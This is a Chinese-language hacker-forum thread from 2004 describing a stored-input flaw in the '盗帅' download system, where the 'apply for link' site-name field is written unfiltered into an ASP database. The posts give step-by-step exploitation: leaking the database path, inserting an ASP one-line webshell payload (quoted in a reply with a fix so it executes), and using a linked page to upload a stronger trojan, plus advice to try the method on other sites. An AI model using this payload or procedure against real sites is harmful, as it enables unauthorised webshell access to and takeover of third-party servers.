返回列表 发帖

盗帅数据库过滤不严导致新漏洞

[这个贴子最后由黑色海岸线在 2004/12/14 02:00am 第 1 次编辑]

作者:linzi QQ:290329536 
影响版本:所有盗帅下载系统,以及对数据库过滤不严的一类网站。

原理:盗帅数据库过滤不严,导致我们可以在申请连接填入的网站名称里直接可以写入asp木马.

漏洞利用:

      1. 用先暴库得到对方为asp的数据库地址。

      2.点击一下下面的  【申请连接】 更多连接>>     中的申请连接。
      3.在网站名称:里写入这一句我木马,然后到
        
http://jsqiji.vicp.net/kl/web/asp.htm填入数据库地址就可以提交就可以写入其它更强大的木马。

Linzi点评:

       本来我测试这个,思路主要是来自前天的动力后台config.asp导致上传webshell那个方法.

我是在想,因为动力当时会把我们写入的东西,不加处理就放入一个asp文件里,所以我在想

别的web,有没有这样不加处理把我们写入的东西放入某个asp文件。当时我第一个想到的是申请

交换的地方,所以先试了一下盗帅,但盗帅是把我们写入的东西放进了数据库,而盗帅本来很多

地方就没有过滤,所以很轻易的可以得到shell,这只是一个思路,我们在旁注的时候也是可以用

这个方法去试别的web,可以说这又是一类漏洞。
这篇技术性不高,但却是一个很妙的思维。这篇本来我是放在技术区里的,但觉得思路很不错,所以发出来.
对于上在说到的动力后台上传的,我已做成了动画.
ps:linzi说的是数据库改为asp的插入漏洞,利用的是在申请连接里插入蓝屏等的小木马来达到实现攻击的作用.如果数据库为mdb等不可执行文件,此漏洞不存在.

盗帅数据库过滤不严导致新漏洞

强 …………………………………………牛…………………………………………

TOP

盗帅数据库过滤不严导致新漏洞

[这个贴子最后由skyxhc在 2004/12/14 09:00am 第 4 次编辑] 其实http://jsqiji.vicp.net/kl/web/asp.htm这个面页跟一种秒杀.asp后台数据库的方法是一样的 都只要在tager的.asp数据库里插入>%execute request("l")%>这一句,再将asp木马代码直接写入到数据库中.然后得到wehsehll. 还有,黑色海岸线,你是不是漏了点什么东东? 在第3点"3.在网站名称:里写入这一句我木马,然后到" 写入什么东东?呵呵,是>%execute request("l")%>这个吧 只是这种方法需要得到对方的数据库,要是别人对数据库做了防爆措施,那就没得玩了. PS:我用这种插>%execute request("l")%>到对方数据库的方法对路还长的dv无效,还有其他的一些也没成功过,说白了就是没成功过...... 不过盗帅一会偶去试试,哈哈 编辑n次终于看到要插入的东东了 呵呵 用的时候将>%execute request("l")%>中的前一个>改成<(大于号)就行了呵呵

TOP

盗帅数据库过滤不严导致新漏洞

我晕
我写的也看不到,进入数据库不显了我改下

TOP

盗帅数据库过滤不严导致新漏洞

郁闷,cgi代码加入注释的代码是什么

TOP

盗帅数据库过滤不严导致新漏洞

我就觉的有问题~~
大于号、小于号之间的代码全不显~

TOP

盗帅数据库过滤不严导致新漏洞

我不是改好了吗? >%execute request("l")%>将>%execute中的>小于号改成<不就ok了?

TOP

返回列表 回复 发帖